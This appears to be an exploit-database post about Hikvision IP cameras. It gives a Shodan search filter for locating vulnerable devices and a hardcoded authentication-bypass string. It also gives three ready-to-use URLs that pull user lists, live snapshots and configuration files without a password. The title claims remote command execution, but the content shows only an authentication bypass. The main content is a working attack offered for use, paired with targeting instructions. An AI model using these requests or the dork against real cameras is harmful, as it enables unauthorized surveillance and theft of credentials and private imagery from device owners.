Hikvision Camera - Remote command execution

# Exploit Title: Exploit Title: Hikvision Camera - Remote command execution # Date: 4/22/2024 # Google Dork : In Shodan search engine, the filter is "Web Version="3.1.3.150324" http.favicon.hash:999357577" # Exploit Author: parsa rezaie khiabanloo # Tested on: Windows/Linux # 1. Description: Hikvision included a magic string that allowed instant access to any camera, regardless of what the admin password was. All that needed was appending this string to Hikvision camera commands: (?auth=YWRtaW46MTEK). # An issue was discovered in Hikvision IP Camera. # 2 . Proof of Concept: Retrieve a list of all users and their roles: - http://camera.ip/Security/users?auth=YWRtaW46MTEK Obtain a camera snapshot without authentication: - http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK Download camera configuration: - http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top